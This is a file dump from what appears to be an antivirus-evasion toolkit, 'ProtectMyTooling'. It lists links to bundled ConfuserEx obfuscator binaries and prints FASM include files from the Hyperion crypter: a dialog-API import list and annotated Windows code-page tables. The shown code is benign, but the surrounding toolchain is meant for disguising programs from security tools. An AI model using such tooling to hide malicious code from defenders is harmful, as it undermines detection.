https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Confuser.CLI.exe
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Confuser.CLI.exe.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Confuser.Core.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Confuser.Core.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Confuser.DynCipher.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Confuser.DynCipher.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Confuser.Protections.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Confuser.Protections.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Confuser.Renamer.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Confuser.Renamer.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Confuser.Runtime.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Confuser.Runtime.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/ConfuserEx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/ConfuserEx.exe
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/ConfuserEx.exe.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/GalaSoft.MvvmLight.Extras.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/GalaSoft.MvvmLight.Extras.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/GalaSoft.MvvmLight.Platform.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/GalaSoft.MvvmLight.Platform.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/GalaSoft.MvvmLight.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/GalaSoft.MvvmLight.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Microsoft.DiaSymReader.Native.amd64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Microsoft.DiaSymReader.Native.amd64.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Microsoft.DiaSymReader.Native.x86.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Microsoft.DiaSymReader.Native.x86.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Microsoft.Win32.Registry.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Microsoft.Win32.Registry.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/NDesk.Options.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/NDesk.Options.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Ookii.Dialogs.Wpf.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Ookii.Dialogs.Wpf.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/System.IO.FileSystem.Primitives.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/System.IO.FileSystem.Primitives.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/System.IO.Packaging.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/System.IO.Packaging.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/System.Security.AccessControl.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/System.Security.AccessControl.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/System.Security.Principal.Windows.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/System.Security.Principal.Windows.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/System.ValueTuple.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/System.ValueTuple.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/System.Windows.Interactivity.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/System.Windows.Interactivity.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/dnlib.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/dnlib.dll
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/API/COMDLG32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; COMDLG32 API calls
3 | ; 'import' takes the library label, then label,'exported name' pairs (see MACRO/IMPORT64.INC for the 64-bit form).
4 | import comdlg32,\
5 | ChooseColorA,'ChooseColorA',\
6 | ChooseColorW,'ChooseColorW',\
7 | ChooseFontA,'ChooseFontA',\
8 | ChooseFontW,'ChooseFontW',\
9 | CommDlgExtendedError,'CommDlgExtendedError',\
10 | FindTextA,'FindTextA',\
11 | FindTextW,'FindTextW',\
12 | FormatCharDlgProc,'FormatCharDlgProc',\
13 | GetFileTitleA,'GetFileTitleA',\
14 | GetFileTitleW,'GetFileTitleW',\
15 | GetOpenFileNameA,'GetOpenFileNameA',\
16 | GetOpenFileNameW,'GetOpenFileNameW',\
17 | GetSaveFileNameA,'GetSaveFileNameA',\
18 | GetSaveFileNameW,'GetSaveFileNameW',\
19 | LoadAlterBitmap,'LoadAlterBitmap',\
20 | PageSetupDlgA,'PageSetupDlgA',\
21 | PageSetupDlgW,'PageSetupDlgW',\
22 | PrintDlgA,'PrintDlgA',\
23 | PrintDlgW,'PrintDlgW',\
24 | ReplaceTextA,'ReplaceTextA',\
25 | ReplaceTextW,'ReplaceTextW',\
26 | WantArrows,'WantArrows',\
27 | dwLBSubclass,'dwLBSubclass',\
28 | dwOKSubclass,'dwOKSubclass'
29 | ; 'api' gets the names without the A/W suffix; WIN32A.INC / WIN32W.INC define it to alias each used name to its A or W label.
30 | api ChooseColor,\
31 | ChooseFont,\
32 | FindText,\
33 | GetFileTitle,\
34 | GetOpenFileName,\
35 | GetSaveFileName,\
36 | PageSetupDlg,\
37 | PrintDlg,\
38 | ReplaceText
39 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1250.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1250
3 |
4 | rept 1 { local ..encoding ; rept 1 only provides a scope in which a unique local label can be declared
5 | __encoding equ ..encoding } ; __encoding names that label for the du macro in this file
6 |
7 | virtual at 0 ; lookup table: code-page 1250 byte -> 16-bit code point, one word per byte value
8 | __encoding:: ; names this block so 'load ... from __encoding:offset' can read it later
9 | times 80h dw %-1 ; bytes 00h-7Fh map to themselves
10 | dw 20ACh,?,201Ah,?,201Eh,2026h,2020h,2021h,?,2030h,160h,2039h,15Ah,164h,17Dh,179h
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,161h,203Ah,15Bh,165h,17Eh,17Ah
12 | dw 0A0h,2C7h,2D8h,141h,0A4h,104h,0A6h,0A7h,0A8h,0A9h,15Eh,0ABh,0ACh,0ADh,0AEh,17Bh
13 | dw 0B0h,0B1h,2DBh,142h,0B4h,0B5h,0B6h,0B7h,0B8h,105h,15Fh,0BBh,13Dh,2DDh,13Eh,17Ch
14 | dw 154h,0C1h,0C2h,102h,0C4h,139h,106h,0C7h,10Ch,0C9h,118h,0CBh,11Ah,0CDh,0CEh,10Eh
15 | dw 110h,143h,147h,0D3h,0D4h,150h,0D6h,0D7h,158h,16Eh,0DAh,170h,0DCh,0DDh,162h,0DFh
16 | dw 155h,0E1h,0E2h,103h,0E4h,13Ah,107h,0E7h,10Dh,0E9h,119h,0EBh,11Bh,0EDh,0EEh,10Fh
17 | dw 111h,144h,148h,0F3h,0F4h,151h,0F6h,0F7h,159h,16Fh,0FAh,171h,0FCh,0FDh,163h,2D9h
18 | end virtual ; rows above cover 80h-0FFh, 16 entries each; '?' leaves the entry for an unassigned byte undefined
19 |
20 | macro du [arg] ; wraps the built-in du: emits arg, then remaps string characters above 7Fh through the __encoding table
21 | { local offset,char
22 | offset = $-$$ ; where this item starts, relative to the section base
23 | du arg ; inside its own body the name still means the original directive
24 | if arg eqtype '' ; only quoted strings are remapped
25 | repeat ($-offset-$$)/2 ; once per 16-bit unit just emitted
26 | load char byte from $$+offset+(%-1)*2 ; first byte of the unit = the code-page byte
27 | if char > 7Fh
28 | load char word from __encoding:char*2 ; table lookup
29 | store word char at $$+offset+(%-1)*2 ; overwrite the emitted unit with the mapped value
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args] ; labelled form 'name du ...': defines name as a word label, then emits through the du macro of this file
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1251.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1251
3 |
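4 | rept 1 { local ..encoding ; rept 1 only provides a scope in which a unique local label can be declared
5 | __encoding equ ..encoding } ; __encoding names that label for the du macro in this file
6 |
7 | virtual at 0 ; lookup table: code-page 1251 byte -> 16-bit code point, one word per byte value
8 | __encoding:: ; names this block so 'load ... from __encoding:offset' can read it later
9 | times 80h dw %-1 ; bytes 00h-7Fh map to themselves
10 | dw 402h,403h,201Ah,453h,201Eh,2026h,2020h,2021h,20ACh,2030h,409h,2039h,40Ah,40Ch,40Bh,40Fh
11 | dw 452h,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,459h,203Ah,45Ah,45Ch,45Bh,45Fh
12 | dw 0A0h,40Eh,45Eh,408h,0A4h,490h,0A6h,0A7h,401h,0A9h,404h,0ABh,0ACh,0ADh,0AEh,407h
13 | dw 0B0h,0B1h,406h,456h,491h,0B5h,0B6h,0B7h,451h,2116h,454h,0BBh,458h,405h,455h,457h
14 | times 40h dw 410h+%-1 ; bytes 0C0h-0FFh map to 410h-44Fh
15 | end virtual ; byte 80h is U+0402; U+0401 belongs to byte 0A8h only. '?' leaves an unassigned byte undefined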
16 |
17 | macro du [arg] ; wraps the built-in du: emits arg, then remaps string characters above 7Fh through the __encoding table
18 | { local offset,char
19 | offset = $-$$ ; where this item starts, relative to the section base
20 | du arg ; inside its own body the name still means the original directive
21 | if arg eqtype '' ; only quoted strings are remapped
22 | repeat ($-offset-$$)/2 ; once per 16-bit unit just emitted
23 | load char byte from $$+offset+(%-1)*2 ; first byte of the unit = the code-page byte
24 | if char > 7Fh
25 | load char word from __encoding:char*2 ; table lookup
26 | store word char at $$+offset+(%-1)*2 ; overwrite the emitted unit with the mapped value
27 | end if
28 | end repeat
29 | end if }
30 |
31 | struc du [args] ; labelled form 'name du ...': defines name as a word label, then emits through the du macro of this file
32 | { common label . word
33 | du args }
34 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1252.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1252
3 |
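4 | rept 1 { local ..encoding ; rept 1 only provides a scope in which a unique local label can be declared
5 | __encoding equ ..encoding } ; __encoding names that label for the du macro in this file
6 |
7 | virtual at 0 ; lookup table: code-page 1252 byte -> 16-bit code point, one word per byte value
8 | __encoding:: ; names this block so 'load ... from __encoding:offset' can read it later
9 | times 80h dw %-1 ; bytes 00h-7Fh map to themselves
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,160h,2039h,152h,?,17Dh,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,161h,203Ah,153h,?,17Eh,178h
12 | times 60h dw 0A0h+%-1 ; bytes 0A0h-0FFh map to themselves
13 | end virtual ; byte 8Eh needs the 'h' suffix (17Dh); a bare 17D is read as decimal 17. '?' leaves an unassigned byte undefined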
14 |
15 | macro du [arg] ; wraps the built-in du: emits arg, then remaps string characters above 7Fh through the __encoding table
16 | { local offset,char
17 | offset = $-$$ ; where this item starts, relative to the section base
18 | du arg ; inside its own body the name still means the original directive
19 | if arg eqtype '' ; only quoted strings are remapped
20 | repeat ($-offset-$$)/2 ; once per 16-bit unit just emitted
21 | load char byte from $$+offset+(%-1)*2 ; first byte of the unit = the code-page byte
22 | if char > 7Fh
23 | load char word from __encoding:char*2 ; table lookup
24 | store word char at $$+offset+(%-1)*2 ; overwrite the emitted unit with the mapped value
25 | end if
26 | end repeat
27 | end if }
28 |
29 | struc du [args] ; labelled form 'name du ...': defines name as a word label, then emits through the du macro of this file
30 | { common label . word
31 | du args }
32 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1253.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1253
3 |
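4 | rept 1 { local ..encoding ; rept 1 only provides a scope in which a unique local label can be declared
5 | __encoding equ ..encoding } ; __encoding names that label for the du macro in this file
6 |
7 | virtual at 0 ; lookup table: code-page 1253 byte -> 16-bit code point, one word per byte value
8 | __encoding:: ; names this block so 'load ... from __encoding:offset' can read it later
9 | times 80h dw %-1 ; bytes 00h-7Fh map to themselves
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,?,2030h,?,2039h,?,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,?,203Ah,?,?,?,?
12 | dw 0A0h,385h,386h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,?,0ABh,0ACh,0ADh,0AEh,2015h
13 | dw 0B0h,0B1h,0B2h,0B3h,384h,0B5h,0B6h,0B7h,388h,389h,38Ah,0BBh,38Ch,0BDh,38Eh,38Fh
14 | times 40h dw 390h+%-1 ; bytes 0C0h-0FFh map to 390h-3CFh
15 | end virtual ; byte 0B8h is U+0388, in sequence with 389h and 38Ah after it. '?' leaves an unassigned byte undefined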
16 |
17 | macro du [arg] ; wraps the built-in du: emits arg, then remaps string characters above 7Fh through the __encoding table
18 | { local offset,char
19 | offset = $-$$ ; where this item starts, relative to the section base
20 | du arg ; inside its own body the name still means the original directive
21 | if arg eqtype '' ; only quoted strings are remapped
22 | repeat ($-offset-$$)/2 ; once per 16-bit unit just emitted
23 | load char byte from $$+offset+(%-1)*2 ; first byte of the unit = the code-page byte
24 | if char > 7Fh
25 | load char word from __encoding:char*2 ; table lookup
26 | store word char at $$+offset+(%-1)*2 ; overwrite the emitted unit with the mapped value
27 | end if
28 | end repeat
29 | end if }
30 |
31 | struc du [args] ; labelled form 'name du ...': defines name as a word label, then emits through the du macro of this file
32 | { common label . word
33 | du args }
34 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1254.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1254
3 |
4 | rept 1 { local ..encoding ; rept 1 only provides a scope in which a unique local label can be declared
5 | __encoding equ ..encoding } ; __encoding names that label for the du macro in this file
6 |
7 | virtual at 0 ; lookup table: code-page 1254 byte -> 16-bit code point, one word per byte value
8 | __encoding:: ; names this block so 'load ... from __encoding:offset' can read it later
9 | times 80h dw %-1 ; bytes 00h-7Fh map to themselves
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,160h,2039h,152h,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,161h,203Ah,153h,?,?,178h
12 | times 30h dw 0A0h+%-1 ; bytes 0A0h-0CFh map to themselves
13 | dw 11Eh,0D1h,0D2h,0D3h,0D4h,0D5h,0D6h,0D7h,0D8h,0D9h,0DAh,0DBh,0DCh,130h,15Eh,0DFh
14 | times 10h dw 0E0h+%-1 ; bytes 0E0h-0EFh map to themselves
15 | dw 11Fh,0F1h,0F2h,0F3h,0F4h,0F5h,0F6h,0F7h,0F8h,0F9h,0FAh,0FBh,0FCh,131h,15Fh,0FFh
16 | end virtual ; '?' leaves the entry for an unassigned byte undefined
17 |
18 | macro du [arg] ; wraps the built-in du: emits arg, then remaps string characters above 7Fh through the __encoding table
19 | { local offset,char
20 | offset = $-$$ ; where this item starts, relative to the section base
21 | du arg ; inside its own body the name still means the original directive
22 | if arg eqtype '' ; only quoted strings are remapped
23 | repeat ($-offset-$$)/2 ; once per 16-bit unit just emitted
24 | load char byte from $$+offset+(%-1)*2 ; first byte of the unit = the code-page byte
25 | if char > 7Fh
26 | load char word from __encoding:char*2 ; table lookup
27 | store word char at $$+offset+(%-1)*2 ; overwrite the emitted unit with the mapped value
28 | end if
29 | end repeat
30 | end if }
31 |
32 | struc du [args] ; labelled form 'name du ...': defines name as a word label, then emits through the du macro of this file
33 | { common label . word
34 | du args }
35 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1255.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1255
3 |
4 | rept 1 { local ..encoding ; rept 1 only provides a scope in which a unique local label can be declared
5 | __encoding equ ..encoding } ; __encoding names that label for the du macro in this file
6 |
7 | virtual at 0 ; lookup table: code-page 1255 byte -> 16-bit code point, one word per byte value
8 | __encoding:: ; names this block so 'load ... from __encoding:offset' can read it later
9 | times 80h dw %-1 ; bytes 00h-7Fh map to themselves
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,?,2039h,?,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,?,203Ah,?,?,?,?
12 | dw 0A0h,0A1h,0A2h,0A3h,20AAh,0A5h,0A6h,0A7h,0A8h,0A9h,0D7h,0ABh,0ACh,0ADh,0AEh,0AFh
13 | dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0F7h,0BBh,0BCh,0BDh,0BEh,0BFh
14 | dw 5B0h,5B1h,5B2h,5B3h,5B4h,5B5h,5B6h,5B7h,5B8h,5B9h,?,5BBh,5BCh,5BDh,5BEh,5BFh
15 | dw 5C0h,5C1h,5C2h,5C3h,5F0h,5F1h,5F2h,5F3h,5F4h,?,?,?,?,?,?,?
16 | dw 5D0h,5D1h,5D2h,5D3h,5D4h,5D5h,5D6h,5D7h,5D8h,5D9h,5DAh,5DBh,5DCh,5DDh,5DEh,5DFh
17 | dw 5E0h,5E1h,5E2h,5E3h,5E4h,5E5h,5E6h,5E7h,5E8h,5E9h,5EAh,?,?,200Eh,200Fh,?
18 | end virtual ; rows above cover 80h-0FFh, 16 entries each; '?' leaves the entry for an unassigned byte undefined
19 |
20 | macro du [arg] ; wraps the built-in du: emits arg, then remaps string characters above 7Fh through the __encoding table
21 | { local offset,char
22 | offset = $-$$ ; where this item starts, relative to the section base
23 | du arg ; inside its own body the name still means the original directive
24 | if arg eqtype '' ; only quoted strings are remapped
25 | repeat ($-offset-$$)/2 ; once per 16-bit unit just emitted
26 | load char byte from $$+offset+(%-1)*2 ; first byte of the unit = the code-page byte
27 | if char > 7Fh
28 | load char word from __encoding:char*2 ; table lookup
29 | store word char at $$+offset+(%-1)*2 ; overwrite the emitted unit with the mapped value
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args] ; labelled form 'name du ...': defines name as a word label, then emits through the du macro of this file
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1256.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1256
3 |
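4 | rept 1 { local ..encoding ; rept 1 only provides a scope in which a unique local label can be declared
5 | __encoding equ ..encoding } ; __encoding names that label for the du macro in this file
6 |
7 | virtual at 0 ; lookup table: code-page 1256 byte -> 16-bit code point, one word per byte value
8 | __encoding:: ; names this block so 'load ... from __encoding:offset' can read it later
9 | times 80h dw %-1 ; bytes 00h-7Fh map to themselves
10 | dw 20ACh,67Eh,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,679h,2039h,152h,686h,698h,688h
11 | dw 6AFh,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,6A9h,2122h,691h,203Ah,153h,200Ch,200Dh,6BAh
12 | dw 0A0h,60Ch,0A2h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,6BEh,0ABh,0ACh,0ADh,0AEh,0AFh
13 | dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,61Bh,0BBh,0BCh,0BDh,0BEh,61Fh
14 | dw 6C1h,621h,622h,623h,624h,625h,626h,627h,628h,629h,62Ah,62Bh,62Ch,62Dh,62Eh,62Fh
15 | dw 630h,631h,632h,633h,634h,635h,636h,0D7h,637h,638h,639h,63Ah,640h,641h,642h,643h
16 | dw 0E0h,644h,0E2h,645h,646h,647h,648h,0E7h,0E8h,0E9h,0EAh,0EBh,649h,64Ah,0EEh,0EFh
17 | dw 64Bh,64Ch,64Dh,64Eh,0F4h,64Fh,650h,0F7h,651h,0F9h,652h,0FBh,0FCh,200Eh,200Fh,6D2h
18 | end virtual ; bytes 0BAh and 0BFh are the Arabic semicolon (U+061B) and question mark (U+061F), not the Latin-1 characters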
19 |
20 | macro du [arg] ; wraps the built-in du: emits arg, then remaps string characters above 7Fh through the __encoding table
21 | { local offset,char
22 | offset = $-$$ ; where this item starts, relative to the section base
23 | du arg ; inside its own body the name still means the original directive
24 | if arg eqtype '' ; only quoted strings are remapped
25 | repeat ($-offset-$$)/2 ; once per 16-bit unit just emitted
26 | load char byte from $$+offset+(%-1)*2 ; first byte of the unit = the code-page byte
27 | if char > 7Fh
28 | load char word from __encoding:char*2 ; table lookup
29 | store word char at $$+offset+(%-1)*2 ; overwrite the emitted unit with the mapped value
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args] ; labelled form 'name du ...': defines name as a word label, then emits through the du macro of this file
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1257.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1257
3 |
4 | rept 1 { local ..encoding ; rept 1 only provides a scope in which a unique local label can be declared
5 | __encoding equ ..encoding } ; __encoding names that label for the du macro in this file
6 |
7 | virtual at 0 ; lookup table: code-page 1257 byte -> 16-bit code point, one word per byte value
8 | __encoding:: ; names this block so 'load ... from __encoding:offset' can read it later
9 | times 80h dw %-1 ; bytes 00h-7Fh map to themselves
10 | dw 20ACh,?,201Ah,?,201Eh,2026h,2020h,2021h,?,2030h,?,2039h,?,0A8h,2C7h,0B8h
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,?,203Ah,?,0AFh,2DBh,?
12 | dw 0A0h,?,0A2h,0A3h,0A4h,?,0A6h,0A7h,0D8h,0A9h,156h,0ABh,0ACh,0ADh,0AEh,0C6h
13 | dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0F8h,0B9h,157h,0BBh,0BCh,0BDh,0BEh,0E6h
14 | dw 104h,12Eh,100h,106h,0C4h,0C5h,118h,112h,10Ch,0C9h,179h,116h,122h,136h,12Ah,13Bh
15 | dw 160h,143h,145h,0D3h,14Ch,0D5h,0D6h,0D7h,172h,141h,15Ah,16Ah,0DCh,17Bh,17Dh,0DFh
16 | dw 105h,12Fh,101h,107h,0E4h,0E5h,119h,113h,10Dh,0E9h,17Ah,117h,123h,137h,12Bh,13Ch
17 | dw 161h,144h,146h,0F3h,14Dh,0F5h,0F6h,0F7h,173h,142h,15Bh,16Bh,0FCh,17Ch,17Eh,2D9h
18 | end virtual ; rows above cover 80h-0FFh, 16 entries each; '?' leaves the entry for an unassigned byte undefined
19 |
20 | macro du [arg] ; wraps the built-in du: emits arg, then remaps string characters above 7Fh through the __encoding table
21 | { local offset,char
22 | offset = $-$$ ; where this item starts, relative to the section base
23 | du arg ; inside its own body the name still means the original directive
24 | if arg eqtype '' ; only quoted strings are remapped
25 | repeat ($-offset-$$)/2 ; once per 16-bit unit just emitted
26 | load char byte from $$+offset+(%-1)*2 ; first byte of the unit = the code-page byte
27 | if char > 7Fh
28 | load char word from __encoding:char*2 ; table lookup
29 | store word char at $$+offset+(%-1)*2 ; overwrite the emitted unit with the mapped value
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args] ; labelled form 'name du ...': defines name as a word label, then emits through the du macro of this file
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1258.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1258
3 |
4 | rept 1 { local ..encoding ; rept 1 only provides a scope in which a unique local label can be declared
5 | __encoding equ ..encoding } ; __encoding names that label for the du macro in this file
6 |
7 | virtual at 0 ; lookup table: code-page 1258 byte -> 16-bit code point, one word per byte value
8 | __encoding:: ; names this block so 'load ... from __encoding:offset' can read it later
9 | times 80h dw %-1 ; bytes 00h-7Fh map to themselves
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,?,2039h,152h,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,?,203Ah,153h,?,?,178h
12 | dw 0A0h,0A1h,0A2h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,0AAh,0ABh,0ACh,0ADh,0AEh,0AFh
13 | dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0BAh,0BBh,0BCh,0BDh,0BEh,0BFh
14 | dw 0C0h,0C1h,0C2h,102h,0C4h,0C5h,0C6h,0C7h,0C8h,0C9h,0CAh,0CBh,300h,0CDh,0CEh,0CFh
15 | dw 110h,0D1h,309h,0D3h,0D4h,1A0h,0D6h,0D7h,0D8h,0D9h,0DAh,0DBh,0DCh,1AFh,303h,0DFh
16 | dw 0E0h,0E1h,0E2h,103h,0E4h,0E5h,0E6h,0E7h,0E8h,0E9h,0EAh,0EBh,301h,0EDh,0EEh,0EFh
17 | dw 111h,0F1h,323h,0F3h,0F4h,1A1h,0F6h,0F7h,0F8h,0F9h,0FAh,0FBh,0FCh,1B0h,20ABh,0FFh
18 | end virtual ; rows above cover 80h-0FFh, 16 entries each; '?' leaves the entry for an unassigned byte undefined
19 |
20 | macro du [arg] ; wraps the built-in du: emits arg, then remaps string characters above 7Fh through the __encoding table
21 | { local offset,char
22 | offset = $-$$ ; where this item starts, relative to the section base
23 | du arg ; inside its own body the name still means the original directive
24 | if arg eqtype '' ; only quoted strings are remapped
25 | repeat ($-offset-$$)/2 ; once per 16-bit unit just emitted
26 | load char byte from $$+offset+(%-1)*2 ; first byte of the unit = the code-page byte
27 | if char > 7Fh
28 | load char word from __encoding:char*2 ; table lookup
29 | store word char at $$+offset+(%-1)*2 ; overwrite the emitted unit with the mapped value
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args] ; labelled form 'name du ...': defines name as a word label, then emits through the du macro of this file
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN874.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 874
3 |
4 | rept 1 { local ..encoding ; rept 1 only provides a scope in which a unique local label can be declared
5 | __encoding equ ..encoding } ; __encoding names that label for the du macro in this file
6 |
7 | virtual at 0 ; lookup table: code-page 874 byte -> 16-bit code point, one word per byte value
